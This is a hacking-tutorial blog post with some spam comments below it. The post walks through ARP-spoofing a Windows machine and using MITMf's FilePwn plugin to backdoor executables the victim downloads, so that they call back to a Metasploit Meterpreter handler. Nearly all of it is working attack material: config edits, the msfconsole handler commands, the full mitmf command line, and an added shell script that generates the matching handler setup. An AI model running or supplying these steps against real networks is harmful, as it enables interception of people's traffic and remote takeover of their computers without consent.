How It Works

MITMf (if you don't already know) is a man-in-the-middle attack framework; the name literally stands for "Man In The Middle framework." It bundles many different tools to help you with MitM attacks. In this case we use its FilePwn plugin to automatically backdoor every executable downloaded by one specific machine. Cool, eh?

In this test we will ARP spoof a Windows 8.1 VM so that its traffic flows through our machine.

Note: FilePwn can only patch files served over plain HTTP, because it has to see and rewrite the response body. For HTTPS sites you would need to downgrade the connection with SSLstrip+ first, and only downloads that are actually downgraded to HTTP can be patched.

Requirements

You will only need MITMf and Metasploit for this attack. MITMf can be installed from the Kali apt repository (apt-get install mitmf) or from the GitHub repository (git clone https://github.com/byt3bl33d3r/MITMf). If you install via apt, remember to run apt-get update first. Metasploit is built into Kali.

Step 1: Editing the Configurations

Now that MITMf is installed, we need to edit its configuration to match our system. The config file is located at /usr/share/mitmf/config/mitmf.cfg (if you installed from GitHub instead, it is config/mitmf.cfg inside the cloned directory).

Scroll down until you get to the FilePwn section.

Below the CompressedFiles settings there is one entry per target platform (WindowsIntelx86 and so on), each with its own HOST and PORT. Set HOST in every entry you intend to use to your own IP address, the one on the interface you will run mitmf on, but don't change the port. Just remember the port number of the entry you want to use, because the listener has to match it.

Step 2: Selecting the Target

When we run MITMf with FilePwn, we want to listen for the payload specific to the target OS. In this case I'm targeting a Windows 8.1 machine, so I would use WindowsIntelx86; the port number for that entry is 8443. Remember your payload's port number for later. If the victim downloads 64-bit executables, those are handled by the separate x64 entry in the same config, which has its own HOST and PORT and needs its own listener with a 64-bit payload.

Step 3: Set Up a Listener

We're going to use Metasploit as our payload listener. Start msfconsole, type use multi/handler and then set your payload. In this case I'm using Meterpreter:

set PAYLOAD windows/meterpreter/reverse_tcp

Set the LHOST and LPORT options. LHOST is the same IP you put in HOST, and LPORT must equal the PORT of the FilePwn entry you chose:

set LHOST 10.0.2.117
set LPORT 8443
(Make sure you set the corresponding port number! The patched executable connects back to whatever HOST and PORT the config says, not to wherever the handler happens to be listening.)

Then run exploit -j to start the handler as a background job. Open up a new terminal for MITMf.

Step 4: Running the Attack

To run the attack, use the following command:
mitmf --spoof --arp -i <interface> --gateway <gateway IP> --target <target IP> --filepwn

For me it would be:
mitmf --spoof --arp -i wlan0 --gateway 10.0.2.1 --target 10.0.2.15 --filepwn

Pretty soon you should see MITMf start logging the target's HTTP traffic.

If the user downloads a file and the file is patchable, you should get output saying "File patched successfully. Sending to target." As soon as the victim opens the file, you should get a Meterpreter session on your handler.

If the log does not say the file was patched, it could not be patched and the victim received the original. Unfortunately this tactic doesn't work 100% of the time: FilePwn only rewrites files it can parse and backdoor, so some downloads go through untouched.
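The whole procedure above hinges on one thing: the HOST and PORT in the FilePwn entry, the Metasploit handler, and the interface mitmf runs on must all agree, and MITMf gives no error when they don't. The script below is an added example (not part of the original post and not MITMf's own code) that reads HOST and PORT out of the config entry, generates a matching msfconsole resource file and the mitmf command line, and checks that HOST is actually bound to the interface. SAMPLE_CFG is a constructed excerpt that mirrors the nesting of the FilePwn targets block; the interface name wlan0, the addresses and the payload are taken from this post, and /usr/share/mitmf/config/mitmf.cfg is where the real file lives.

```shell
#!/bin/sh
# Added example, not from the original post or from MITMf.
# ASSUMPTION: SAMPLE_CFG is a constructed excerpt mirroring the layout of the
# FilePwn targets block in mitmf.cfg; only the HOST and PORT keys are relied on.
set -eu

SAMPLE_CFG='[FilePwn]
    [[targets]]
        [[[ALL]]]
            [[[[LinuxIntelx86]]]]
                HOST = 10.0.2.117
                PORT = 8888
            [[[[WindowsIntelx86]]]]
                HOST = 10.0.2.117
                PORT = 8443
'

# cfg_value ENTRY KEY: read a mitmf.cfg-style file on stdin and print KEY
# from the [[[[ENTRY]]]] block. Every line starting with "[" opens a new
# block, so a key is only matched while inside the requested entry.
cfg_value() {
    awk -v tgt="[[[[$1]]]]" -v key="$2" '
        /^[[:space:]]*\[/ { inblk = ($1 == tgt); next }
        inblk && $1 == key && $2 == "=" { print $3; exit }
    '
}

# handler_rc HOST PORT PAYLOAD: print a msfconsole resource script for a
# background handler that matches the FilePwn entry.
handler_rc() {
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$3"
    printf 'set LHOST %s\n' "$1"
    printf 'set LPORT %s\n' "$2"
    printf 'set ExitOnSession false\n'   # keep listening after the first session
    printf 'exploit -j\n'
}

# mitmf_cmd IFACE GATEWAY TARGET: the ARP spoof + FilePwn command line.
mitmf_cmd() {
    printf 'mitmf --spoof --arp -i %s --gateway %s --target %s --filepwn\n' "$1" "$2" "$3"
}

# host_on_iface HOST IFACE: succeed only if HOST is an IPv4 address bound to
# IFACE. A HOST the victim cannot reach means the patched executable calls
# back to nowhere, and MITMf still reports "File patched successfully".
host_on_iface() {
    ip -4 -o addr show dev "$2" 2>/dev/null | awk -v h="$1" '
        { split($4, a, "/"); if (a[1] == h) found = 1 }
        END { exit !found }
    '
}

# Demo on the constructed excerpt. For the real file use:
#   cfg_value WindowsIntelx86 PORT < /usr/share/mitmf/config/mitmf.cfg
ENTRY=WindowsIntelx86
PAYLOAD=windows/meterpreter/reverse_tcp
HOST=$(printf '%s\n' "$SAMPLE_CFG" | cfg_value "$ENTRY" HOST)
PORT=$(printf '%s\n' "$SAMPLE_CFG" | cfg_value "$ENTRY" PORT)

handler_rc "$HOST" "$PORT" "$PAYLOAD"   # save as handler.rc, then: msfconsole -r handler.rc
mitmf_cmd wlan0 10.0.2.1 10.0.2.15
# Before launching for real:
#   host_on_iface "$HOST" wlan0 || echo "HOST $HOST is not bound to wlan0"
```

Run it once before the attack: the resource script it prints is what Step 3 types by hand, and because LHOST/LPORT are read from the same config entry FilePwn uses, a mismatched port cannot slip in. The host_on_iface check is the one MITMf never does for you.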

Conclusion

Now we know how to run a very neat trick: backdooring on the fly. This gets even better if you do it from a mobile device, as you will be very discreet. Don't abuse this power. As the MITMf help menu says, quoting Yoda, "Use wisely, young padawan."

C|H of C3


0 Replies to “Exploit Target Without Sending Anything”

  1. Spot on with this writeup, I actually believe this website needs a great deal more attention. I'll probably be returning to read through more, thanks for the info! cagakddckbed

  2. Thanks for this article. I'd also like to express that it can often be hard, if you are in school and simply starting out, to initiate a long credit standing. There are many students who are just trying to endure, and an extended or favourable credit history is often a difficult matter to have. gddbefefdebfedbk

  3. Obviously I like your website; however, you need to check the spelling on several of your posts. Several of them are rife with spelling issues and I find it very bothersome, to tell the truth; on the other hand I will definitely come again. ccgfddeaeegd
